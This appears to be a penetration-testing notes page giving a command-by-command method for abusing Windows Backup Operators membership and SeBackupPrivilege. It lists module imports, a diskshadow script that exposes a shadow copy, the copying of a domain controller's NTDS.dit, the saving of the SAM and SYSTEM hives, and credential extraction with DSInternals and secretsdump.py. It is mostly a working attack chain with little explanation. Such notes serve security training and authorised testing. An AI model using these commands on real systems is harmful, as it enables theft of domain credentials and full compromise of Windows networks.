8.Windows-built-in-groups

Approach to Exploiting Windows Built-in Groups (Focus: Backup Operators)

Identify Group Memberships:

whoami /groups  # Check if the user is in "Backup Operators"

Verify SeBackupPrivilege:

whoami /priv  # Check if SeBackupPrivilege is present
Get-SeBackupPrivilege  # PowerShell cmdlet

Enable SeBackupPrivilege (if needed):

Set-SeBackupPrivilege  # PowerShell cmdlet

Import SeBackupPrivilege Modules:

Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll

Access Protected Files:

dir <protected_directory>  # Verify lack of access
Copy-FileSeBackupPrivilege <protected_file> <destination>
robocopy /B <source> <destination> <file>

Target Domain Controller (NTDS.dit):

diskshadow.exe  # Create shadow copy
set verbose on
set metadata C:\Windows\Temp\meta.cab
set context clientaccessible
set context persistent
begin backup
add volume C: alias cdrive
create
expose %cdrive% E:
end backup
exit

Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit <destination>
robocopy /B E:\Windows\NTDS\ <destination> ntds.dit

Backup Registry Hives:

reg save HKLM\SYSTEM SYSTEM.SAV
reg save HKLM\SAM SAM.SAV

Extract Credentials (NTDS.dit):

Import-Module .\DSInternals.psd1
$key = Get-BootKey -SystemHivePath .\SYSTEM
Get-ADDBAccount -DistinguishedName <DN> -DBPath .\ntds.dit -BootKey $key

secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL

Commands:

whoami /groups
whoami /priv
diskshadow.exe
reg save
secretsdump.py
robocopy /B
dir

PowerShell Cmdlets:

Get-SeBackupPrivilege
Set-SeBackupPrivilege
Copy-FileSeBackupPrivilege
Import-Module .\DSInternals.psd1
Get-BootKey
Get-ADDBAccount
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll

Tools:

diskshadow.exe (Windows built-in)
reg.exe (Windows built-in)
secretsdump.py (Impacket)
robocopy.exe (Windows built-in)
DSInternals (PowerShell module)
SeBackupPrivilegeUtils.dll and SeBackupPrivilegeCmdLets.dll (Custom PowerShell modules)

Techniques:

Leverage SeBackupPrivilege to bypass file ACLs.
Use diskshadow to create shadow copies of locked files.
Extract credentials from NTDS.dit and registry hives.
Use robocopy as an alternative to custom scripts.

PreviousKey Concepts:NextExploiting Event Log Readers Group for Security Log Access

Last updated 8 months ago

hashtagApproach to Exploiting Windows Built-in Groups (Focus: Backup Operators)

hashtagIdentify Group Memberships:

hashtagVerify SeBackupPrivilege:

hashtagEnable SeBackupPrivilege (if needed):

hashtagImport SeBackupPrivilege Modules:

hashtagAccess Protected Files:

hashtagTarget Domain Controller (NTDS.dit):

hashtagBackup Registry Hives:

hashtagExtract Credentials (NTDS.dit):

hashtagCommands:

hashtagPowerShell Cmdlets:

hashtagTools:

hashtagTechniques:

Approach to Exploiting Windows Built-in Groups (Focus: Backup Operators)

Identify Group Memberships:

Verify SeBackupPrivilege:

Enable SeBackupPrivilege (if needed):

Import SeBackupPrivilege Modules:

Access Protected Files:

Target Domain Controller (NTDS.dit):

Backup Registry Hives:

Extract Credentials (NTDS.dit):

Commands:

PowerShell Cmdlets:

Tools:

Techniques: